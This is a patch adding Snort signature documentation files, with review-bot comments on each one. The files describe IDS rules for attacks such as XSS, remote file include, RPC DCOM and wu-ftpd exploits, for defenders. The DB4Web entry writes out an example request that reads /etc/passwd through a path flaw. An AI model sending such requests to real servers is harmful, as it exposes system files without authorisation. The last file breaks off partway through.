+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://happymall.happycgi.com/forum/forum_detail.cgi?thread=353
+
+--
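Review bot: Corrective Action rests entirely on "An unconfirmed patch" at a vendor forum thread. Because Detailed Information pins the bug down precisely (a "file" parameter to "normal_html.cgi" "enclosed by any combination of pipe or semicolon characters"), also advise restricting access to that script and validating the parameter against an allow-list of expected file names until a confirmed fix exists. Formatting: the separators alternate between "--" and "-- " with trailing space, several are followed by an extra blank line (before Impact, Attack Scenarios, Ease of Attack and Corrective Action), and "None Known." is capitalised differently from the other files in the patch.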
--- /dev/null
+++ b/doc/signatures/100000656.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000656
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "email" parameter in the "guestbook.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
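Review bot: the Impact paragraph overstates the issue: the Summary and Attack Scenarios describe a cross site scripting bug in the "email" parameter of "guestbook.php" delivered through "a malicious link", yet Impact claims "Possible unauthorized administrative access to the server" and "execution of arbitrary code", and Detailed Information adds "execute system binaries". Trim Impact to what XSS actually yields (theft of session data or credentials from the victim's browser, injected page content) or cite the advisory that supports the stronger claim. Minor: no blank line precedes the "--" separators after the Sid, Affected Systems and Contributors blocks, and the file ends with an extra blank line.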
--- /dev/null
+++ b/doc/signatures/2453.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2453
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running is invited to participate in a Yahoo conference.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A Yahoo IM conference allows multiple users to participate in the exchange of text and voice messages, as well as share files and webcams.  It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
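Review bot: "such as as virus, worm, Trojan, or backdoor" in Detailed Information has a doubled word ("such as a virus"). The False Negatives entry says Yahoo IM traffic "may use other ports than the default expected ones" but the document never states which ports the rule watches; naming them would let operators judge the gap.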
--- /dev/null
+++ b/doc/signatures/1312.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1312
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "nude cheerleader".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "nude cheerleader".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
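Review bot: the Summary reads "a webpage was visited the included the content" and should be "that included the content". Formatting: a stray blank line separates "Sid:" from "1312", the Contributors line is missing a space in "Steven Alexander<alexander.s@mccd.edu>", and a run of empty lines trails the "Additional References:" heading before the closing separator.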
--- /dev/null
+++ b/doc/signatures/100000723.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000723
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "permissions.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "permissions.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
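Review bot: the third Detailed Information paragraph and the Attack Scenarios text describe an authentication weakness ("validating the credentials of a client host", "supply his/her own credentials") that has nothing to do with the remote file include in the "phpraid_dir" parameter named in the Summary; they look pasted from another template and should be replaced by a scenario for this bug (a URL to an attacker-controlled file supplied as "phpraid_dir" to "permissions.php"). "ona web server" in that paragraph should be "on a web server", and the file opens with two blank lines before "Rule:". Corrective Action could also mention disabling remote file inclusion in the PHP configuration (allow_url_include), which stops this class of bug regardless of patch level.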
--- /dev/null
+++ b/doc/signatures/338.txt
@@ -0,0 +1,60 @@
+SID:
+338
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
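Review bot: the section layout differs from the other files in this patch: "SID:" comes before "Rule:", the heading is upper-case, the final section is "References:" rather than "Additional References:", and each "--" separator has its blank line after it instead of before; align with the common template. "wu-ftpd 2.6 .0" in Affected Systems has a stray space ("2.6.0"), and the Corrective Action sentence "Maybe even get rid of wu-ftp with something more secure" should read "or replace wu-ftpd with a more secure ftp daemon". The References block is empty even though Detailed Information describes a specific SITE EXEC format string flaw; cite the advisory.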
--- /dev/null
+++ b/doc/signatures/100000639.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000639
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_import.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_import.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
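Review bot: as in the other remote file include entries in this patch, the Summary says the problem is a remote file passed in "admin_template_path" to "template_import.php", while the last Detailed Information paragraph and Attack Scenarios talk about credential validation and "supply his/her own credentials", which is a different bug class; replace them with the file include scenario. "ona web server" should be "on a web server", "an exploitation attempt has been attempted" is redundant ("an exploitation attempt has been made"), and Additional References is empty.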
--- /dev/null
+++ b/doc/signatures/997.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 997
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
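Review bot: "Impact: Information gathering possible administrator access." is missing a conjunction ("Information gathering and possible administrator access."). The Summary and Detailed Information describe "a potential weakness" in IIS without naming the file or request matched, even though Attack Scenarios says "An attacker can retrieve a sensitive file"; name that file so the "None Known." false positive entry can be assessed. "Sid: 997" sits on one line unlike the other files, and Additional References is empty with an extra blank line.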
--- /dev/null
+++ b/doc/signatures/684.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid: 
+684
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft SQL Command summary:
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_da-di_8nas.asp
+
+--
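Review bot: the Affected Systems section is missing entirely (Detailed Information runs straight into Attack Scenarios). "Attack Scenarios: Simple. These are SQL database commands." is an ease rating, not a scenario; describe what the command does when an attacker issues it. The paragraph "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" does not fit an SQL rule and reads as if copied from a telnet signature; drop it or rewrite it for database sessions. Finally, the only reference is titled "Microsoft SQL Command summary"; stating which statement or stored procedure the rule matches would tie the document to the rule.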
--- /dev/null
+++ b/doc/signatures/3442.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3442
+
+--
+Summary:
+This event is generated when an attempt is made exploit a known
+vulnerability in Microsoft Windows TCP/IP print services.
+
+--
+Impact:
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Microsoft Windows TCP/IP print services are used to share printers
+attached to Windows based machines with other UNIX based hosts.
+
+Microsoft Windows TCP/IP print services are vulnerable to a DoS when
+processing malformed print requests. Other services may also be affected
+and may need to be restarted to regain functionality should this attack
+be sucessful.
+
+--
+Affected Systems:
+	Microsoft Windows TCP/IP print services for Windows NT
+	Microsoft Windows TCP/IP print services for Windows 2000
+
+--
+Attack Scenarios:
+An attacker can send a malformed print request to port 515 on the server
+hosting the print services and cause the DoS condition.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
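Review bot: "when an attempt is made exploit a known vulnerability" in the Summary is missing "to", and "sucessful" in Detailed Information should be "successful". Additional References is empty although Affected Systems lists specific products (TCP/IP print services for Windows NT and Windows 2000) and Attack Scenarios names port 515; cite the vendor bulletin for the malformed print request DoS. Corrective Action could add blocking port 515 from untrusted networks, which follows directly from the attack scenario given.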
--- /dev/null
+++ b/doc/signatures/702.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+702
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
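Review bot: Affected Systems is blank. The Summary refers to "a known vulnerability in Microsoft SQL" but neither it nor Detailed Information names the vulnerability or says whether the rule inspects client or server traffic ("Microsoft SQL server or client"), and Additional References is empty; one sentence on the matched content and the affected versions would make the "None known." entries under False Positives and False Negatives meaningful.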
--- /dev/null
+++ b/doc/signatures/3399.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3399
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
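Review bot: "Expoit code exists." in Ease of Attack should be "Exploit code exists." Additional References is empty for an issue the text ties to a specific vendor component (RPC DCOM) with a clear affected list from Windows NT 4.0 to Windows Server 2003; cite the vendor bulletin. The Attack Scenarios text ("a request for a file with an overly long filename via a network share") should also say how that request reaches the RPC traffic the rule inspects, since Corrective Action talks about blocking ports 135, 139 and 445.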
--- /dev/null
+++ b/doc/signatures/2768.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2768
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_grouped_column
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
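Review bot: in Detailed Information the procedure name and the sentence after it are split oddly: "vulnerability in the procedure drop_grouped_column" ends one line and the next begins ". This procedure is included in", which reads like a failed template substitution; join them into "the procedure drop_grouped_column. This procedure is included in dbms_repcat." Affected Systems reads "Oracle Oracle9i" (doubled vendor name), "Apply the appropriate vendor supplied patch" lacks its period, and Additional References is empty for a named package and procedure.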
--- /dev/null
+++ b/doc/signatures/2060.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2060
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in DB4Web.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+DB4Web is an application server used to access various sources of data 
+via a web interface.
+
+DB4Web does not handle the characters ":" and "\" correctly when they 
+are URL encoded. An attacker can use this flaw to gain access to 
+sensitive system information.
+
+Also the application does not correctly handle the use of extra "/" in a
+URI.
+
+It is also possible for the attacker to open arbitrary TCP connections 
+using DB4Web and may be able to use it for portscanning other hosts.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+The attacker merely needs to make a normal HTTP request with the 
+characters ":" or "\" encoded (%3A%5C) followed by the commands the 
+attacker wishes to run.
+
+The attacker can also make a request like 
+http://www.foo.com/cgi-bin/db4web_c/dbdirname//etc/passwd to view the 
+contents of the password file.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable access to DB4Web from external sources.
+
+Apply the appropriate vendor patches.
+
+Run the webserver in a chroot environment to mitigate the risks of 
+disclosure.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+DB4Web
+http://www.db4web.de/DB4Web/home/DB4Web/hotfix_e.html
+
+--
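Review bot: Affected Systems is blank even though Additional References links a DB4Web hotfix page; list the affected versions from it. "Also the application does not correctly handle" needs a comma after "Also", and the three flaws in Detailed Information (URL-encoded ":" and "\", extra "/" in a URI, arbitrary TCP connections) are not matched to this SID; say which of them the rule detects. The chroot advice in Corrective Action mitigates the file disclosure but not the TCP connection abuse that the text says "may be able to use it for portscanning other hosts"; an egress filter on the DB4Web host would cover that case.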
--- /dev/null
+++ b/doc/signatures/3291.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3291
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
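Review bot: this file is identical word for word to doc/signatures/3399.txt earlier in the patch, down to the "Expoit code exists." typo in Ease of Attack, so nothing tells the reader what distinguishes SID 3291 from SID 3399; fix the typo in both and add a sentence to Detailed Information on what this rule matches that the other does not. The empty Additional References block should cite the vendor bulletin for the RPC DCOM issue.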
--- /dev/null
+++ b/doc/signatures/100000162.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000162
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of 401 Unauthorized 
+messages are returned by an SIP-enabled host.
+
+--
+Impact:
+This can be an indication of either a brute force authentication attack or a 
+denial of service in progress.
+
+--
+Detailed Information:
+When a user attempts to send a REGISTER message with invalid credentials, a SIP 
+server returns a 401 Unauthorized message. A high volume of these may indicate 
+that an authentication attack, likely brute-force style, or a denial of service 
+is in progress.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to attempt a brute-force authentication attack 
+or a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is easy to write a script to cycle through all possible 
+authentication values or to simply flood a system with unauthorized data.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
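Review bot: "abnormally larger number" in Summary should be "abnormally large number", and "an SIP-enabled host" should be "a SIP-enabled host". The "Additional References" heading lacks its colon and is followed by an empty "Other:" label; add a reference or drop the label. False Positives "None known" is doubtful for a volume-based rule: a legitimate endpoint with stale credentials retrying REGISTER, or a fleet of phones re-registering after an outage, will also produce bursts of 401 responses, and Corrective Action should mention rate limiting or lockout at the SIP registrar alongside border filtering.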
--- /dev/null
+++ b/doc/signatures/410.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+410
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Fragment Reassembly Time Exceeded message.
+
+--
+
+Impact:
+This could be an indication of an improperly configured routing device or networked host.  
+
+--
+
+Detailed Information:
+ICMP Type 11 Code 1 is the RFC defined messaging type for ICMP Fragment Reassembly Time exceeded datagrams.  If a host fails to reassemble a fragmented datagram before the TTL of the datagram is expires an ICMP Fragment Reassembly Time Exceeded datagram is generated.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Fragment reassembly Time Exceeded messages are normally and indication of improperly configured hosts or routing equipment.  The configurations of the devices causing these ICMP datagrams to be created should be checked for errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
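Review bot: "before the TTL of the datagram is expires" in Detailed Information should read "before the TTL of the datagram expires", and "normally and indication" in Corrective Action should be "normally an indication". Attack Scenarios says "None known" while Ease of Attack says numerous tools can generate this ICMP type; the two sections should agree. This file also omits the Affected Systems section present in the other documents, and the "--" after False Negatives is missing the blank line used everywhere else in the file.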
--- /dev/null
+++ b/doc/signatures/2923.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2923
+
+--
+Summary:
+This event is generated when repeated failed attempts are made to access
+an SMB share.
+ 
+--
+Impact:
+Unknown. Possible information disclosure and loss of data.
+
+--
+Detailed Information:
+This event indicates that multiple failed attempts have been made to
+access an SMB network share. This may indicate a determined effort by an
+unauthorized user to access information and data on a network share.
+
+--
+Affected Systems:
+	All systems sharing resources using SMB
+
+--
+Attack Scenarios:
+An attacker can make repeated attempts to access network shares in an
+attempt to gain information.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply strict access control to all networked resources.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
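Review bot: The "Rule:" line and the separator before Additional References carry trailing whitespace, and "None known" lacks the terminating period used in the neighbouring files. Corrective Action could be more actionable: since Detailed Information describes repeated failed access attempts, suggest reviewing the SMB server's authentication failure logs for the source address and considering account lockout thresholds, in addition to "strict access control".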
--- /dev/null
+++ b/doc/signatures/3112.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3112
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
